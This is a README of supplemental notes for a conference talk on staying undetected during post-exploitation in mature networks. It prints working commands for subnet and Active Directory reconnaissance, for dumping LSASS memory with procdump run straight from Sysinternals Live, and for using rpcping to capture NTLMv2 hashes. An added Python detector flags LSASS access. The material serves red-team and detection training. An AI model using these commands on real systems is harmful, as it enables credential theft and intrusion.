Supplemental material from my talk at Wild West Hackin Fest in May 2022.

cwolff411/WWHF-StayingQuiet

Move in Silence: Staying Quiet in Mature Networks

This repo is supplemental material for my presentation for Wild West Hackin Fest's Way West conference in San Diego in 2022.

Abstract

Security Operations Centers and event monitoring have advanced by leaps and bounds in the past decade. While this is a good thing for cybersecurity as a whole, for red teamers and penetration testers it means that Metasploit payloads and common tools simply won't work. Any attempt to drop tools like Mimikatz or Responder will be contained by even the most basic antivirus and EDR. Want to kick off an Nmap scan and recon the network? Good luck with that!

This presentation focuses on ways to accomplish required tasks in a quiet manner. It covers performing network reconnaissance while emulating typical user behavior, performing the same tasks as common tools with alternative methods, obfuscating our code, and executing the same techniques as some of the world's most advanced threat actors – all while staying quiet.

Things to Know

Everything in this discussion is based around post-exploitation scenarios, meaning that you have already landed on a machine, escalated privileges, and are looking to move throughout the network.

Recon Subnets

Use arp

arp -a

Ping broadcast address

ping -b x.x.x.255

Ping sweep on command line

PowerShell:

1..254 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}

bash:

for i in $(seq 1 255); do ping -c 1 192.168.1.$i | tr '\n' ' ' | awk '/1 received/ {print $2}'; done

Recon Active Directory

ldapsearch

Dump all of LDAP

ldapsearch -x -h x.x.x.x -b "DC=contoso,DC=com"


Parse machines from LDAP and perform nslookup

https://github.com/dirkjanm/ldapdomaindump


Lateral Movement/Priv Esc

Dumping LSASS with procdump

Be fancy and run it straight from Sysinternals Live:

\\live.sysinternals.com\tools\procdump -ma lsass.exe OUTFILE.dmp

Or download procdump from https://docs.microsoft.com/en-us/sysinternals/ and run it the same way as above.
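From the blue-team side, the procdump step above is exactly what Sysmon Event ID 10 (ProcessAccess) is watched for. The following is an added example, not code from this repo, that runs a small detector over constructed Sysmon-style records; the allowlist and the sample events are assumptions for the example.

```python
# Added example (not from the original repo): a small detector for LSASS memory
# access, run over constructed Sysmon Event ID 10 (ProcessAccess) records.
PROCESS_VM_READ = 0x0010            # access right needed to copy process memory out
PROCESS_QUERY_INFORMATION = 0x0400  # usually requested alongside it

# Constructed sample records modelled on Sysmon's ProcessAccess fields.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"\\live.sysinternals.com\tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\EDR\agent.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]

# Hypothetical allowlist of images that legitimately read LSASS memory; assumed
# for this example and to be tuned per environment.
ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\program files\edr\agent.exe"}


def classify(event):
    """Return the reasons this ProcessAccess event is suspicious (empty list if none)."""
    if event.get("EventID") != 10:
        return []
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return []
    source = event["SourceImage"].lower()
    mask = int(event["GrantedAccess"], 16)
    reasons = []
    # Only an access mask that can actually read memory matters; csrss with
    # 0x1400 (QUERY_INFORMATION | QUERY_LIMITED_INFORMATION) does not qualify.
    if mask & PROCESS_VM_READ and source not in ALLOWLIST:
        reasons.append("lsass_memory_read")
    # An image executing straight off a UNC share (Sysinternals Live, for instance)
    # rarely has a legitimate reason to open LSASS, whatever the mask.
    if source.startswith("\\\\"):
        reasons.append("remote_source_image")
    return reasons


def find_lsass_dumpers(events):
    """Return [(SourceImage, reasons)] for every event that trips a rule."""
    return [(e["SourceImage"], r) for e in events if (r := classify(e))]


if __name__ == "__main__":
    for image, reasons in find_lsass_dumpers(SAMPLE_EVENTS):
        print(f"ALERT {image}: {', '.join(reasons)}")
```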

Getting NTLMv2 hashes with rpcping

rpcping is a lolbin that will allow you to send an authenticated RPC ping to a remote host along with the current user's NTLMv2 hash. Use it when you pop a shell but don't know the compromised user's password.

Check out the lolbas page on it

Creating SSL Tunnels

I've talked about this before in my presentation for Red Team Village. Check it out here

Resources
